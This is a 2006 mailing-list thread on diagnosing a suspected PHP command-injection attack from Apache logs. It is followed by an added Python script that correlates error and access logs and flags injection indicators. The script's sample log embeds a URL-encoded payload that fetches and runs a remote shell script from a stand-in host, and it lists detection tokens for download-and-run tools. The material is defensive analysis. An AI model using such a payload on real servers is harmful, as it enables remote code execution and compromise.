I've seen this type of thing with PHP; I was going to say something but I figured I would wait since you didn't mention it. Can you correlate the time/date/IP with the request from access.log? It might give you more information. I can say that we get attacked regularly on Sarge and we're a relatively high-volume site with similar specs, and I've not seen anything like this as a standard hack; my experience is that this is most often caused by not filtering/validating forms, global PHP variables, or PHP scripting errors. I am very curious to know what's going on.
> -----Original Message-----
> From: Josep Serrano [mailto:[EMAIL PROTECTED]
> Sent: Wednesday, February 01, 2006 4:53 AM
> To: [email protected]
> Subject: RE: Weird message in my apache error log
>
> Hello guys,
>
> No, I can't think of any specific application. Yes, this web server is running a
> couple of php scripts but that's it.
>
> Following your recommendations I have installed mod_security with the set of
> standard rules provided in www.modsecurity.org. I will be following up the audit log
> for any clues.
>
> Be sure that I have strange files, permissions, or open ports in this box. I run
> daily checks and I got the vaccines :-)
>
> Thanks,
> Josep SERRANO.
>
> > What does your application do? It looks like it is finding a shell script
> > somewhere? We've seen similar things when executing CGIs and not filtering
> > the input data so well. Lines 22 and 24 make me think there is a script
> > somewhere rather than arbitrary GET data.
> >
> >> -----Original Message-----
> >> Looks like someone is trying to do arbitrary command execution. You
> >> probably have a script somewhere that says `command $_GET['var']`, and
> >> someone is passing ';attack' as var, but it isn't quite working.
> >>
> >> I suggest using the audit log feature of mod_security, or just grepping
> >> through your access logs for anything odd ('wget' is a good search
> >> term).
> >>
> >> You might have a bot on the system, check for any odd network
> >> connections, especially to port 6667 (IRC). Also look for www-data owned
> >> files in /tmp.
>
>
> --
> To UNSUBSCRIBE, email to [EMAIL PROTECTED]
> with a subject of "unsubscribe". Trouble? Contact
> [EMAIL PROTECTED]
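The two checks the thread recommends, correlating the error.log time/date/IP with the matching request in access.log and grepping the requests for 'wget' and shell metacharacters, as one script. This is an added example, not code from anyone in the thread; the error_log and access_log lines it reads are constructed for the example, and the client IPs, paths and payload in them are hypothetical. It assumes Apache 2.0-style error_log lines ("[date] [level] [client IP] message") and Common Log Format access_log lines, with both logs written in the server's local time.

```python
"""Correlate Apache error_log entries with access_log requests and flag
the requests that look like OS command injection (the `command $_GET['var']`
plus ';attack' pattern described in the thread).

Added example, not from the original thread. Log lines below are constructed;
IPs, paths and the payload are hypothetical.
"""
import re
from datetime import datetime, timedelta
from urllib.parse import unquote_plus

# Constructed Apache 2.0-style error_log: [timestamp] [level] [client IP] message
ERROR_LOG = """\
[Wed Feb 01 04:40:12 2006] [error] [client 203.0.113.7] sh: line 1: wget: command not found
[Wed Feb 01 04:40:12 2006] [error] [client 203.0.113.7] sh: line 1: ./x.sh: No such file or directory
[Wed Feb 01 04:41:03 2006] [error] [client 198.51.100.22] File does not exist: /var/www/favicon.ico
"""

# Constructed Common Log Format access_log; the injected payload is URL-encoded,
# as it is on the wire, so a naive grep for ';' or 'wget ' can miss it
ACCESS_LOG = """\
203.0.113.7 - - [01/Feb/2006:04:32:50 +0100] "GET /index.php HTTP/1.1" 200 4021
203.0.113.7 - - [01/Feb/2006:04:40:11 +0100] "GET /cgi-bin/ping.php?host=127.0.0.1%3Bwget+http%3A%2F%2F198.51.100.9%2Fx.sh%3Bsh+x.sh HTTP/1.0" 200 312
198.51.100.22 - - [01/Feb/2006:04:41:03 +0100] "GET /favicon.ico HTTP/1.1" 404 209
"""

ERROR_RE = re.compile(r'^\[([^\]]+)\] \[(\w+)\] (?:\[client ([0-9a-fA-F.:]+)\] )?(.*)$')
ACCESS_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([A-Z]+) (\S+) (\S+)" (\d{3}) (\S+)')

# Characters that let a value break out of `command $_GET['var']` into a second command
SHELL_META = re.compile(r'[;|&`$]')
# Tokens rare in legitimate query strings but typical of download-and-run payloads
SUSPICIOUS_TOKENS = ("wget", "curl", "/bin/sh", "/tmp/", "chmod")


def parse_error_line(line):
    """Return {'time', 'level', 'client', 'message'}, or None if the line does not match."""
    m = ERROR_RE.match(line)
    if not m:
        return None
    ts, level, client, message = m.groups()
    # error_log timestamps are server local time with no UTC offset
    return {"time": datetime.strptime(ts, "%a %b %d %H:%M:%S %Y"),
            "level": level, "client": client, "message": message}


def parse_access_line(line):
    """Return {'client', 'time', 'method', 'path', 'status'}, or None if the line does not match."""
    m = ACCESS_RE.match(line)
    if not m:
        return None
    client, ts, method, path, _proto, status, _size = m.groups()
    # access_log carries an offset; drop it after parsing so the value is the same
    # local wall-clock time that error_log records
    when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z").replace(tzinfo=None)
    return {"client": client, "time": when, "method": method,
            "path": path, "status": int(status)}


def injection_indicators(path):
    """List the reasons a request path looks like a command injection attempt."""
    decoded = unquote_plus(path)  # attackers send ';' as %3B and spaces as '+'
    found = []
    if SHELL_META.search(decoded):
        found.append("shell metacharacter")
    found.extend(tok for tok in SUSPICIOUS_TOKENS if tok in decoded)
    return found


def correlate(error_log, access_log, window=timedelta(seconds=5)):
    """Pair each error_log entry with the same client's requests logged within `window`."""
    requests = [r for r in map(parse_access_line, access_log.splitlines()) if r]
    hits = []
    for err in filter(None, map(parse_error_line, error_log.splitlines())):
        if not err["client"]:
            continue  # startup/shutdown notices carry no client
        for req in requests:
            if req["client"] == err["client"] and abs(req["time"] - err["time"]) <= window:
                hits.append({"client": err["client"], "error": err["message"],
                             "request": req["path"],
                             "indicators": injection_indicators(req["path"])})
    return hits


def flagged(error_log, access_log):
    """Only the correlated pairs whose request carries injection indicators."""
    return [h for h in correlate(error_log, access_log) if h["indicators"]]


if __name__ == "__main__":
    for h in flagged(ERROR_LOG, ACCESS_LOG):
        print(h["client"], unquote_plus(h["request"]), h["indicators"], sep="\n  ")
```

Run against real files with `correlate(open("/var/log/apache/error.log").read(), open("/var/log/apache/access.log").read())`. The favicon 404 pairs up too, because it comes from the same client at the same second, but carries no indicators, which is why the script decodes the request before looking at it rather than trusting the correlation alone; widen `window` if the error is written by a long-running child process well after the request line was logged.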

